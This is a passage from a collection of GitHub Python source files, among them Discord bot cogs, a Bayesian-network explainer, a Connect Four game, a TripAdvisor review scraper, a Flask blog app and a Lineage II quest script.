Registration Complete...\"\n )\n if not user_info:\n await manager.send_private_message(\n \"Oops, something went wrong during registration. Please try again.\"\n )\n return await manager.clean_messages()\n\n bungie_access_token = user_info.get(\"access_token\")\n\n # Fetch platform specific display names and membership IDs\n try:\n user = await execute_pydest(\n self.bot.destiny.api.get_membership_current_user,\n bungie_access_token,\n return_type=DestinyMembershipResponse,\n )\n except Exception as e:\n log.exception(e)\n await manager.send_private_message(\n \"I can't seem to connect to Bungie right now. Try again later.\"\n )\n return await manager.clean_messages()\n\n if not user.response:\n await manager.send_private_message(\n \"Oops, something went wrong during registration. Please try again.\"\n )\n return await manager.clean_messages()\n\n if not self.user_has_connected_accounts(user.response):\n await manager.send_private_message(\n \"Oops, you don't have any public accounts attached to your Bungie.net profile.\"\n )\n return await manager.clean_messages()\n\n bungie_user = User(user.response)\n\n member_ids = [\n (bungie_user.memberships.xbox.id, constants.PLATFORM_XBOX),\n (bungie_user.memberships.psn.id, constants.PLATFORM_PSN),\n (bungie_user.memberships.steam.id, constants.PLATFORM_STEAM),\n (bungie_user.memberships.stadia.id, constants.PLATFORM_STADIA),\n (bungie_user.memberships.blizzard.id, constants.PLATFORM_BLIZZARD),\n (bungie_user.memberships.bungie.id, constants.PLATFORM_BUNGIE),\n ]\n\n member_db = await self.bot.database.get_member_by_platform(\n bungie_user.memberships.bungie.id, constants.PLATFORM_BUNGIE\n )\n if not member_db:\n # Create a list of member id with their respective platforms, if the id is not null\n member_id_list = (\n (member_id, platform_id)\n for member_id, platform_id in member_ids\n if member_id\n )\n # Grab the first one and craft the query data\n member_id, platform_id = next(member_id_list)\n query_data = dict(member_id=member_id, platform_id=platform_id)\n\n # Query for that member, if that fails create a skeleton entry\n member_db = await self.bot.database.get_member_by_platform(**query_data)\n if not member_db:\n member_db = await Member.create()\n\n # Save OAuth credentials and Bungie User data\n for key, value in bungie_user.to_dict().items():\n setattr(member_db, key, value)\n\n member_db.discord_id = ctx.author.id\n member_db.bungie_access_token = bungie_access_token\n member_db.bungie_refresh_token = user_info.get(\"refresh_token\")\n await member_db.save()\n\n e = discord.Embed(colour=constants.BLUE, title=\"Full Registration Complete\")\n\n emojis = []\n # Update platform roles to match connected accounts\n if ctx.guild:\n guild_roles_db = await Role.filter(guild__guild_id=ctx.guild.id)\n member_platforms = [\n platform_id for member_id, platform_id in member_ids if member_id\n ]\n\n guild_roles = [\n discord.utils.get(ctx.guild.roles, id=role_db.role_id)\n for role_db in guild_roles_db\n if role_db.platform_id in member_platforms\n ]\n\n await ctx.author.add_roles(*guild_roles)\n\n platform_names = list(constants.PLATFORM_MAP.keys())\n platform_ids = list(constants.PLATFORM_MAP.values())\n\n platform_emojis = [\n constants.PLATFORM_EMOJI_MAP.get(\n platform_names[platform_ids.index(platform)]\n )\n for platform in member_platforms\n ]\n\n message = f\"User {str(ctx.author)} ({ctx.author.id}) has registered\"\n\n if platform_emojis:\n emojis = \" \".join(\n [\n str(self.bot.get_emoji(emoji))\n for emoji in platform_emojis\n if emoji\n ]\n )\n e.add_field(name=\"Platforms Connected\", value=emojis)\n message = f\"{message} with platforms {emojis}\"\n\n await embed.edit(embed=e)\n await self.bot.reg_channel.send(message)\n\n return await manager.clean_messages()\n\n def user_has_connected_accounts(self, user):\n \"\"\"Return true if user has connected destiny accounts\"\"\"\n if user.destiny_memberships:\n return True\n\n\ndef setup(bot):\n bot.add_cog(RegisterCog(bot))\n","repo_name":"henworth/SeraphSix","sub_path":"seraphsix/cogs/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"36563129564","text":"from abc import ABC, abstractmethod\nfrom itertools import product\nimport numpy as np\nfrom probExplainer import utils\n\n\nclass Model(ABC):\n # CONSTRUCTOR\n def __init__(self, implementation):\n self.implementation = implementation\n self.variables_labels = dict()\n self.name = \"\"\n\n # GETTERS\n def get_implementation(self):\n return self.implementation\n\n def get_name(self):\n return self.name\n\n def get_variables(self):\n return sorted(list(self.variables_labels.keys()))\n\n def get_variables_labels(self):\n return self.variables_labels\n\n def get_domain_of(self, variables) -> list:\n domains = []\n for variable in variables:\n domains.append(self.variables_labels[variable])\n return [p for p in product(*domains)]\n\n # INTERFACE\n # MAP-Query (multivariate predict)\n # Gets the a posteriori distribution of y_names\n # evidence: dataframe_series or dict\n # if y_names not given, the ones not in X will be used\n def maximum_a_posteriori(self, evidence, target):\n posterior = self.compute_posterior(evidence, target)\n return self.argmax(posterior, target)\n\n @abstractmethod\n def compute_posterior(self, evidence: dict, target: list) -> np.array:\n pass\n\n @abstractmethod\n def evidence_likelihood(self, evidence: dict):\n pass\n\n # Univariate predict\n # Gets the univariate a posteriori distribution for attribute in y_names\n # It could also be added as an input in the previous function\n def compute_univariate(self, evidence: dict, target: list):\n pass\n\n def map_independence(self, set_r: list, ev_vars: dict, map: dict, posterior=None, return_jsd=False):\n if return_jsd:\n map_dep, jsd = self.map_dependence(set_r, ev_vars, map, posterior=posterior, return_jsd=True)\n return not map_dep, jsd\n else:\n return not self.map_dependence(set_r, ev_vars, map)\n\n def map_dependence(self, set_r: list, ev_vars: dict, map: dict, posterior=None, return_jsd=False):\n if return_jsd and posterior is None:\n err = \"For the Jensen-Shannon divergence to be computed, the parameter \\\"posteriors\\\"\" \\\n \" should contain an array representing the probabilities of the targets y given the evidence\"\n raise Exception(err)\n\n # Check which are the supplementary (missing) variables\n variables = self.get_variables()\n supp_vars = []\n for var in variables:\n if var not in list(ev_vars.keys()) and var not in list(map.keys()):\n supp_vars.append(var)\n # Check if R in unobserved\n for R in set_r:\n if R not in supp_vars:\n err = \"The variable \" + R + \" is in the set R but is not a supplementary node\"\n raise Exception(err)\n\n # Obtain domain of R\n omega_r = self.get_domain_of(set_r)\n # For each value assignment r in omega(R)\n jsd = 0\n for value_assignment_r in omega_r:\n # Fill in values\n ev_vars_alt = ev_vars.copy()\n for i, value in enumerate(value_assignment_r):\n ev_vars_alt[set_r[i]] = value\n # print(instance)\n # print(instance_alt)\n # Inference with evidence and r\n try:\n posterior_alt = self.compute_posterior(evidence=ev_vars_alt, target=list(map.keys()))\n map_alt = self.argmax(posterior_alt, list(map.keys()))[0]\n # Check if we need to compute the jsd divergence between P(H|e) and P(H|e,r)\n if return_jsd:\n jsd = max(jsd, utils.JSD(posterior, posterior_alt))\n if map != map_alt:\n if return_jsd:\n return True, jsd\n else:\n return True\n except ImplausibleEvidenceException:\n continue\n if return_jsd:\n return False, jsd\n else:\n return False\n\n def map_independence_strength(self, set_r: list, ev_vars: dict, map: dict):\n # Check which are the supplementary (missing) variables\n variables = self.get_variables()\n supp_vars = []\n for var in variables:\n if var not in list(ev_vars.keys()) and var not in list(map.keys()):\n supp_vars.append(var)\n # Check if R in unobserved\n for R in set_r:\n if R not in supp_vars:\n err = \"The variable \" + R + \" is in the set R but is not a supplementary node\"\n raise Exception(err)\n\n # Obtain domain of R\n omega_r = self.get_domain_of(set_r)\n # For each value assignment r in omega(R)\n p_r_given_e = self.compute_posterior(evidence=ev_vars, target=set_r)\n #print(set_r)\n #print(p_r_given_e)\n strength = 0\n for value_assignment_r in omega_r:\n # Fill in values\n ev_vars_alt = ev_vars.copy()\n for i, value in enumerate(value_assignment_r):\n ev_vars_alt[set_r[i]] = value\n try:\n posterior_alt = self.compute_posterior(evidence=ev_vars_alt, target=list(map.keys()))\n map_alt = self.argmax(posterior_alt, list(map.keys()))[0]\n #print(\"R value: \", {i[0]: i[1] for i in zip(set_r, value_assignment_r)})\n #print(\"MAP alternative: \",map_alt)\n # Check if we need to compute the jsd divergence between P(H|e) and P(H|e,r)\n if map == map_alt:\n strength = strength + utils.get_probability(self, array_prob=p_r_given_e, dim_names=set_r,\n assignment={i[0]: i[1] for i in zip(set_r, value_assignment_r)})\n except ImplausibleEvidenceException:\n continue\n if strength < 0 :\n strength = 0\n if strength > 1 :\n strength = 1\n return strength\n\n def argmax(self, array_prob, dim_names=None):\n if dim_names is None:\n dim_names = list(range(len(array_prob.shape)))\n assert (len(array_prob.shape) == len(dim_names))\n max_index = np.unravel_index(array_prob.argmax(), array_prob.shape)\n return {dim_names[i]: self.get_domain_of([dim_names[i]])[max_index[i]][0] for i in range(len(dim_names))}, \\\n array_prob[max_index]\n\n def argmin(self, array_prob, dim_names=None):\n if dim_names is None:\n dim_names = list(range(len(array_prob.shape)))\n assert (len(array_prob.shape) == len(dim_names))\n max_index = np.unravel_index(array_prob.argmin(), array_prob.shape)\n return {dim_names[i]: self.get_domain_of([dim_names[i]])[max_index[i]][0] for i in range(len(dim_names))}, \\\n array_prob[max_index]\n\n\nclass ImplausibleEvidenceException(Exception):\n pass\n","repo_name":"Enrique-Val/ProbExplainer","sub_path":"probExplainer/model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20418623821","text":"import numpy as np\n\nROWS = 7\nCOLS = 6\n\ndef create_board():\n #board = [[0] * COLS for _ in range(ROWS)]\n board = np.zeros((COLS,ROWS))\n return board\n\ndef valid_selection(board,col):\n return board[5][col] == 0 # valid selection\n\ndef next_open_row(board,col):\n # gets the row the piece falls on\n for r in range(ROWS):\n if board[r][col] == 0:\n return r\n\ndef drop_piece(board,row,col,piece):\n board[row][col] = piece\n\ndef print_board(board):\n print(np.flip(board,0))\n\ndef inBounds(board,r,c):\n n,m = len(board), len(board[0])\n return 0 <= r < n and 0 <= c < m\n\ndef dfsv(board,r,c,piece,cnt):\n\n while inBounds(board,r,c) and board[r][c] == piece:\n r+=1\n cnt+=1\n if cnt == 4: return True\n # vertital\n return False\n \n \ndef dfsh(board,r,c,piece,cnt):\n \n while inBounds(board,r,c) and board[r][c] == piece:\n c+=1\n cnt+=1\n if cnt == 4: return True\n return False\n # horizontal\n \n\ndef dfsd(board,r,c,piece,cnt):\n \n while inBounds(board,r,c) and board[r][c] == piece:\n r+=1\n c+=1\n cnt+=1\n if cnt == 4: return True\n # diagonal\n return False\n\ndef win(board):\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] == 1 or board[i][j] == 2:\n \n horizontal = dfsh(board,i,j+1,board[i][j],1)\n vertical = dfsv(board,i+1,j,board[i][j],1)\n diagonal = dfsd(board,i+1,j+1,board[i][j],1)\n \n if horizontal == True or vertical == True or diagonal == True:\n return True\n \n \n return False\n \n # dfs vertical \n # dfs horizontal\n # dfs diafonal\n\n\nboard = create_board()\nprint_board(board)\ngame_over = False\n\nturn = 0\n\nwhile not game_over:\n # player 1 turn\n if turn % 2 == 0:\n col = int(input('Player 1! Please make your selection (0-6).'))\n if valid_selection(board,col):\n row = next_open_row(board,col)\n drop_piece(board,row,col,1)\n\n else:\n col = int(input('Player 2! Please make your selection (0-6).'))\n if valid_selection(board,col):\n row = next_open_row(board,col)\n drop_piece(board,row,col,2)\n print_board(board)\n game_over = win(board)\n \n turn +=1\nprint(\"Congrats Player\" +str(((turn-1)%2) + 1)+ \" !!!\")\n","repo_name":"loosesoup/chest","sub_path":"c4cli.py","file_name":"c4cli.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6759056722","text":"from konradtechnologies_rtms.rtms_client import *\nfrom konradtechnologies_rtms.target import RadarTarget, DynamicRadarTarget\n\n\ndef dynamic_target_example(ip_address):\n # Create RTMS object\n rtms_client = RtmsClient(ip_address)\n\n # Connect to RTMS\n rtms_client.connect()\n\n # Create two dynamic targets\n # The first target will move out from 20m to 80m, then back 40m\n moving_target_1 = [DynamicRadarTarget(start_x=0, start_y=20, end_x=0, end_y=80, rcs=30, velocity=10),\n DynamicRadarTarget(start_x=0, start_y=80, end_x=0, end_y=40, rcs=30, velocity=20)]\n\n # The second target will move from 100m to 120m.\n moving_target_2 = [DynamicRadarTarget(start_x=0, start_y=100, end_x=0, end_y=120, rcs=30, velocity=5)]\n\n # Send the targets to RTMS\n rtms_client.set_dynamic_range_targets([moving_target_1, moving_target_2])\n\n # Disconnect\n rtms_client.disconnect()\n\n\ndef main():\n \"\"\"Uncomment the example you'd like to run. For each example,\n replace the IP address with one that is appropriate for your\n connection to RTMS.\"\"\"\n ip_address = \"127.0.0.1\"\n\n dynamic_target_example(ip_address)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"konradtechnologies/rtms-python","sub_path":"examples/dynamic_target.py","file_name":"dynamic_target.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5857358026","text":"\"\"\"Commonly used hyperparameters and utility functions\"\"\"\n\nimport math\nimport numpy as np\nimport generator as g\nfrom features import features_by_name\n\n# reproducibility\nSTATE = np.random.RandomState(42)\n\nGENERATOR_DEFAULTS = {\n \"interm_nodes_dist\": lambda r: round(g.truncnorm(r, mean=5, sd=3, low=0)),\n \"pos_dist\": lambda r: r.uniform(low=(0, 0), high=(25, 25)),\n \"capacity_dist\": lambda r: g.truncnorm(r, mean=35, sd=10, low=0),\n \"power_dist\": lambda r: r.normal(30, 2),\n \"interm_blocks_dist\": lambda r: round(g.truncnorm(r, mean=3, sd=2, low=0)),\n \"pairwise_connection\": lambda r: r.rand() < 0.1,\n \"block_weight_dist\": lambda r: g.truncnorm(r, mean=10, low=0, sd=7),\n # mean equivalent to a linear SINRth of 20, which is what marvelo uses\n \"requirement_dist\": lambda r: g.truncnorm(r, mean=4, low=0, sd=1),\n \"num_sources_dist\": lambda r: round(g.truncnorm(r, mean=2, sd=1, low=1)),\n \"connection_choice\": lambda r, a: r.choice(a),\n}\n\nMARVELO_DEFAULTS = {\n # 4-9 nodes total, including source+sink\n \"interm_nodes_dist\": lambda r: r.randint(2, 7 + 1),\n \"pos_dist\": lambda r: r.uniform(low=(0, 0), high=(25, 25)),\n \"capacity_dist\": lambda r: r.randint(21, 21 * (2 + r.rand())),\n # always 1 watt\n \"power_dist\": lambda r: 30,\n # 3-6 blocks total, including source+sink\n \"interm_blocks_dist\": lambda r: r.randint(1, 4 + 1),\n \"pairwise_connection\": lambda r: False,\n \"block_weight_dist\": lambda r: r.rand() * 20,\n # equivalent to a constant linear SINRth of 20\n \"requirement_dist\": lambda r: math.log(20 + 1, 2),\n \"num_sources_dist\": lambda r: 1,\n \"connection_choice\": lambda r, a: r.choice(a),\n}\n\nDEFAULT_FEATURES = [\n features_by_name()[name]\n for name in [\n \"node_relay\",\n \"edge_additional_timeslot\",\n \"edge_datarate_fraction\",\n \"edge_capacity\",\n \"node_options_lost\",\n ]\n]\n\nDEFAULT = {\n \"learnsteps\": 30000,\n \"prioritized_replay_alpha\": 0.6,\n \"prioritized_replay_beta0\": 0.4,\n \"prioritized_replay_beta_iters\": None, # all steps\n \"prioritized_replay_eps\": 1e-6,\n \"learning_starts\": 1000,\n \"buffer_size\": 50000,\n \"lr\": 5e-4,\n \"grad_norm_clipping\": 5,\n \"gamma\": 0.9,\n \"target_network_update_freq\": 500,\n \"train_freq\": 4,\n \"batch_size\": 32,\n \"early_exit_factor\": np.infty,\n \"num_processing_steps\": 40,\n \"latent_size\": 16,\n \"num_layers\": 5,\n \"seedgen\": lambda: STATE.randint(0, 2 ** 32),\n \"experiment_name\": \"default\",\n \"prioritized\": True,\n \"features\": DEFAULT_FEATURES,\n \"generator_args\": GENERATOR_DEFAULTS,\n \"restart_reward\": 0,\n \"success_reward\": 0,\n \"additional_timeslot_reward\": -1,\n \"exploration_fraction\": 0.2,\n \"rl_seed\": STATE.randint(0, 2 ** 32),\n}\n","repo_name":"timokau/wsn-embedding-rl","sub_path":"hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37801511528","text":"\r\ndef ReviewCrawler(URL):\r\n from selenium import webdriver\r\n import time\r\n import pandas as pd\r\n url = URL\r\n\r\n driver = webdriver.Chrome(\"/Users/hansuho/PycharmProjects/chrome_driver/chromedriver\")\r\n driver.get(url)\r\n # driver.maximize_window()\r\n time.sleep(5)\r\n\r\n\r\n review_dict = {}\r\n try:\r\n total_review_window = driver.find_element_by_class_name(\"lNyfxzGc\")\r\n total_rating = total_review_window.find_element_by_css_selector(\".DrjyGw-P._1SRa-qNz._3t0zrF_f._1QGef_ZJ\").text\r\n total_review_cnt = total_review_window.find_element_by_css_selector(\".DrjyGw-P._26S7gyB4._14_buatE._2nPM5Opx\").text\r\n\r\n satisfactions = total_review_window.find_elements_by_css_selector(\"._1P_xnQHX\")\r\n satisfactions_list = []\r\n for satisfaction in satisfactions:\r\n each_cnt = satisfaction.find_element_by_css_selector(\".DrjyGw-P._26S7gyB4._1dimhEoy\").text\r\n satisfactions_list.append(each_cnt)\r\n review_dict[0] = {'total_rating': total_rating, \"total_review_cnt\": total_review_cnt,\r\n 'very satisfied': satisfactions_list[0], 'satisfied': satisfactions_list[1],\r\n 'neither satisfied nor dissatisfied': satisfactions_list[2],\r\n 'dissatisfied': satisfactions_list[3], 'very dissatisfied': satisfactions_list[4]}\r\n except:\r\n pass\r\n\r\n\r\n review_num = 1\r\n for i in range(2):\r\n time.sleep(5)\r\n # contents = driver.find_element_by_class_name(\"_1c8_1ITO\")\r\n # reviews = contents.find_elements_by_css_selector(\"div\")\r\n reviews = driver.find_elements_by_css_selector(\"#tab-data-qa-reviews-0 > div > div._1c8_1ITO > div\")\r\n\r\n for review in reviews[:-1]: # reviews 는 한 페이지에 있는 리뷰 10개\r\n try:\r\n writer = review.find_element_by_css_selector(\"._7c6GgQ6n._22upaSQN._37QDe3gr.WullykOU._3WoyIIcL\").text\r\n review_title = review.find_element_by_class_name(\"_2tsgCuqy\").text\r\n review_date = review.find_element_by_class_name(\"_3JxPDYSx\").text\r\n content = review.find_elements_by_class_name(\"_2tsgCuqy\")[1].text\r\n rating = review.find_element_by_class_name(\"zWXXYhVR\").get_attribute(\"title\")\r\n rating = rating[-3:]\r\n review_dict[review_num] = {\"writer\": writer, \"review_title\": review_title, \"review_date\": review_date,\r\n \"content\": content, \"rating\": rating}\r\n except:\r\n continue\r\n\r\n review_num += 1\r\n if i < 1: # 마지막 페이지에서는 다음 페이지로 넘어가지 않도록\r\n try: # 페이지 다음 버튼 클릭\r\n next_button = driver.find_element_by_xpath('//*[@id=\"tab-data-qa-reviews-0\"]/div/div[5]/div[11]/div[1]/div/div[1]/div[2]/div/a')\r\n driver.execute_script(\"arguments[0].click();\", next_button)\r\n except:\r\n print(\"다음 페이지 리뷰가 없습니다.\")\r\n break\r\n time.sleep(3)\r\n driver.close()\r\n return review_dict\r\n\r\n\r\n\r\n## test\r\n# a = ReviewCrawler('https://www.tripadvisor.co.kr/Attraction_Review-g1074321-d3805449-Reviews-Bongjeongsa_Temple-Andong_Gyeongsangbuk_do.html')\r\n# print(a)\r\n\r\n\r\n'''\r\npageNumbers Class 는 span -a -a -a 혹은 2페이지라면 a -span -a -a 의 형태로 이루어져있기 때문에\r\nspan.text (번호 출력) 번째의 a를 click해주면 됨\r\n'''\r\n'''\r\nreview = reviews[0].find_element_by_class_name(\"IRsGHoPm\")\r\nrating = reviews[0].find_element_by_css_selector(\".ui_bubble_rating\").get_attribute(\"class\")\r\n # class=\"ui_bubble_rating bubble_50\" 클래스 중간 공백은 클래스가 두 개로 분리돼있다는 것으로 이해하고 get_attribute로 class 가져옴\r\n # class끝이 평점에 따라서 숫자가 바뀌므로 공백으로 분리된 클래스 앞의 것을 잡아와서 전체 클래스명을 불러오는 과정\r\n'''\r\n\r\n","repo_name":"hansuho113/CrawlingPractice","sub_path":"Trip-Advisor/ReviewCrawling.py","file_name":"ReviewCrawling.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26139538317","text":"from flask import Flask, request, render_template, redirect, g, flash\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom article import Article\n\napp = Flask(__name__, static_url_path=\"\", static_folder=\"static\")\napp.secret_key = 'secretKey'\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n articles = Article()\n if request.method == \"POST\" and request.form[\"search_string\"]:\n query_string = request.form[\"search_string\"]\n articles = articles.search(query_string)\n return render_template(\"index.html\",\n articles=articles)\n else:\n articles = articles.get_five_more_recent()\n return render_template(\"index.html\",\n articles=articles)\n\n\n@app.route(\"/article/\", methods=[\"GET\"])\ndef show_article(identifiant):\n article = Article()\n article = article.get_article(identifiant)\n if(article is None):\n return render_template(\"404.html\"), 404\n return render_template(\"article/single_article.html\", article=article)\n\n\n@app.route(\"/edit/\", methods=[\"GET\", \"POST\"])\ndef edit_article(identifiant):\n article = Article()\n if request.method == \"GET\":\n article = article.get_article(identifiant)\n if (article is None):\n return render_template(\"404.html\"), 404\n return render_template(\"article/edit_article.html\", article=article)\n else:\n status = article.update(identifiant, request.form)\n if (status == \"success\"):\n message = {\"status\": \"success\", \"message\": \"Article updated\"}\n flash(message)\n else:\n message = {\"status\": \"danger\", \"message\": \"An error occured\"}\n flash(message)\n article = article.get_article(identifiant)\n return render_template(\"article/edit_article.html\", article=article)\n\n\n@app.route(\"/admin\", methods=[\"GET\"])\ndef admin():\n article = Article()\n all_articles = article.get_all_articles()\n return render_template(\"article/all_articles.html\", articles=all_articles)\n\n\n@app.route(\"/admin-nouveau\", methods=[\"GET\", \"POST\"])\ndef new_admin():\n if request.method == \"GET\":\n return render_template(\"article/article_form.html\",\n action=\"/admin-nouveau\", article=\"\")\n else:\n article = Article()\n obj = article.create_article(request.form)\n if(obj[\"status\"] == \"success\"):\n message = {\"status\": \"success\", \"message\": \"Article created\"}\n flash(message)\n else:\n message = {\"status\": \"danger\",\n \"message\": \"All input are required.\"}\n flash(message)\n\n return render_template(\"article/article_form.html\", article=obj[\"obj\"])\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n app.logger.info(e)\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef page_not_found(e):\n app.logger.info(e)\n return render_template('500.html'), 500\n\nif __name__ == \"__main__\":\n handler = RotatingFileHandler('log_info.log',\n maxBytes=10000, backupCount=1)\n handler.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.run(debug=True)\n","repo_name":"davidboutet/inf3005_tp1","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14895289859","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\n\ndescription = \"Python library for automation tests of smart cards using \"\\\n \"virtualization.\"\n\nhere = Path(__file__).parent # return directory of current file\nreadme = Path(here, \"README.md\")\nrequirements = Path(here, \"requirements.txt\")\n\nwith requirements.open() as f:\n reqs = f.readlines()\n\nwith readme.open() as f:\n long_description = f.read()\n\ngraphical_reqs = [\n 'python-uinput',\n 'opencv-python',\n 'pandas',\n 'numpy',\n 'pytesseract',\n 'keyboard',\n]\n\nsetup(\n name=\"SCAutolib\",\n version=\"1.1.0\",\n description=description,\n long_description=long_description,\n long_description_content_type='text/markdown',\n url=\"https://github.com/redhat-qe-security/SCAutolib\",\n author=\"Pavel Yadlouski\",\n author_email=\"pyadlous@redhat.com\",\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'Environment :: Console',\n 'Framework :: Pytest',\n 'Framework :: tox',\n 'Intended Audience :: Developers',\n 'Operating System :: Unix',\n 'Topic :: Software Development :: Testing',\n 'Topic :: Software Development :: Testing :: Acceptance',\n ],\n packages=find_packages(),\n python_requires='>=3',\n install_requires=reqs,\n extras_require={\n 'graphical': graphical_reqs\n },\n include_package_data=True,\n tests_require=[\"pytest\", \"pytest-env\"],\n entry_points={\n \"console_scripts\": [\"scauto=SCAutolib.cli_commands:cli\"]\n }\n)\n","repo_name":"ondrej-mach/SCAutolib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"36432605430","text":"from com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"NoblesseTeleport\"\nNPC=[30006,30059,30080,30134,30146,30177,30233,30256,30320,30540,30576,30836,30848,30878,30899,31275,31320,31964]\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)\n\n def onTalk (Self,npc,player):\n st = player.getQuestState(qn) \n if player.isNoble() == 1 :\n htmltext=\"noble.htm\"\n else :\n htmltext=\"nobleteleporter-no.htm\"\n st.exitQuest(1)\n return htmltext\n\nQUEST = Quest(2000,qn,\"Teleports\")\nCREATED = State('Start', QUEST)\n\nQUEST.setInitialState(CREATED)\n\nfor item in NPC:\n QUEST.addStartNpc(item)\n QUEST.addTalkId(item)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/teleports/NoblesseTeleport/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"39907095467","text":"from os import walk\nlisteFichiers=[]\nfor (repertoire, sousRepertoires, fichiers) in walk(\"./data/\"):\n listeFichiers.extend(fichiers)\nlisteFichiers.sort()\n\nfor name in listeFichiers:\n fichier=open(\"./data/\"+name,\"r\")\n readata=fichier.readlines()\n date_heure=name.split(\".\")\n date_heure=date_heure[0].replace(date_heure[0],date_heure[0][4:])\n for i in range(len(readata)):\n readata[i]=readata[i].split(\";\")\n readata[i][2]=readata[i][2].replace(\"\\n\",\"\")\n #tout ça pour dégager le \\n de la fin SUPER\n temp=open(\"./parkings/\"+readata[i][0]+\".dat\",\"a\")\n temp.write(date_heure+\";\"+readata[i][0]+\";\"+readata[i][1]+\";\"+readata[i][2])\n temp.write(\"\\n\")\n temp.close()\n print(\"Data \"+date_heure+\" écrite sur son fichier \"+readata[i][0]+\".dat\")","repo_name":"ThibaultGarcia/SAE15_22-23","sub_path":"datapark.py","file_name":"datapark.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40861015195","text":"\n\n\nfrom logging import StrFormatStyle\nfrom os import name\nimport discord\nfrom discord.errors import HTTPException\nfrom discord.ext import commands\nimport platform\nimport assets\nimport utilities\nwatermark = utilities.get_json(assets.watermark_file)\n\nclass botinfo(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n\n @commands.command(name='botinfo')\n async def botinfo(self, ctx):\n\n discord_version = discord.__version__\n python_version = platform.python_build\n total_guilds = len(self.bot.guilds)\n total_members = len(set(self.bot.get_all_members()))\n ping = 'Pong! `{0} ms `'.format(round(self.bot.latency * 1000))\n dev_version = \"V3.0: Dev-006\"\n live_version = \"V2.3\"\n\n embed = discord.Embed(name='Bot information', color = discord.Color.green())\n embed.set_author(name=watermark[\"Watermark\"])\n embed.add_field(name=\"**Discord version:**\", value= discord_version, inline=False)\n embed.add_field(name=\"**Python version:**\", value=platform.python_version(), inline=False)\n embed.add_field(name=\"**Bot Dev Version:**\", value=dev_version, inline=False)\n embed.add_field(name=\"Live bot version:\", value=live_version, inline=False)\n embed.add_field(name=\"**Total guilds:**\", value=total_guilds, inline=False)\n embed.add_field(name=\"**Total members:**\", value=total_members, inline=False)\n embed.add_field(name=\"**Latency:**\", value=ping, inline=False)\n\n try:\n await ctx.send(embed = embed)\n except HTTPException as e:\n await ctx.send(f\"Python version: {python_version}\\nDiscord Version: {discord_version}\\nTotal Guilds: {total_guilds}\\nTotal members: {total_members}\")\n\n\n\n @commands.command(name='av')\n async def av(self, ctx, member : discord.Member = None):\n if member != None:\n await ctx.send(member.avatar_url)\n else:\n await ctx.send(ctx.author.avatar_url)\n\n \n @commands.command(name='whois')\n async def whois(self, ctx, member : discord.Member = None):\n if member is not None:\n embed = discord.Embed(name='User information.', color = discord.Color.green())\n date_format = \"%a, %d %b %Y %I:%M %p\"\n embed.set_author(name=member.display_name, url = member.avatar_url)\n embed.set_thumbnail(url = member.avatar_url)\n embed.add_field(name=\"Joined at:\", value= member.joined_at.strftime(date_format))\n members = sorted(ctx.guild.members, key=lambda m: m.joined_at)\n embed.add_field(name=\"Join position\", value=str(members.index(member) +1 ))\n embed.add_field(name=\"Registered at:\", value=member.created_at.strftime(members))\n\n if len(member.roles) > 1:\n role_string = ' '.join([r.mention for r in member.roles][1:])\n embed.add_field(name=\"Roles [{}]\".format(len(member.roles) -1 ), value=role_string, inline=False)\n return await ctx.send(embed=embed)\n else:\n embed.add_field(name=\"Roles:\", value=\"None\")\n return await ctx.send(embed=embed)\n else:\n member = ctx.author\n embed = discord.Embed(name='User information.', color = discord.Color.green())\n date_format = \"%a, %d %b %Y %I:%M %p\"\n embed.set_author(name=member.display_name, url = member.avatar_url)\n embed.set_thumbnail(url = member.avatar_url)\n embed.add_field(name=\"Joined at:\", value= member.joined_at.strftime(date_format))\n members = sorted(ctx.guild.members, key=lambda m: m.joined_at)\n embed.add_field(name=\"Join position\", value=str(members.index(member) +1 ))\n embed.add_field(name=\"Registered at:\", value=member.created_at.strftime(date_format))\n\n if len(member.roles) > 1:\n role_string = ' '.join([r.mention for r in member.roles][1:])\n embed.add_field(name=\"Roles 